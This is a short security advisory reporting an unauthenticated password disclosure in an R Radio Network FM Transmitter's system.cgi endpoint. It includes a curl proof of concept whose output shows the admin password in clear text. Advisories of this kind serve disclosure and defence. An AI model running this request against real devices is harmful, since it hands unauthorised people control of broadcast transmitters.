R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

`  
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure  
  
  
Vendor: R Radio Network  
Product web page: http://www.pktc.ac.th  
Affected version: 1.07  
  
Summary: R Radio FM Transmitter that includes FM Exciter and  
FM Amplifier parameter setup.  
  
Desc: The transmitter suffers from an improper access control  
that allows an unauthenticated actor to directly reference the  
system.cgi endpoint and disclose the clear-text password of the  
admin user allowing authentication bypass and FM station setup  
access.  
  
Tested on: CSBtechDevice  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5802  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php  
  
  
09.10.2023  
  
--  
  
  
$ curl -s http://192.168.70.12/system.cgi  
<html><head><title>System Settings</title>  
...  
...  
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>  
...  
...  
$   
`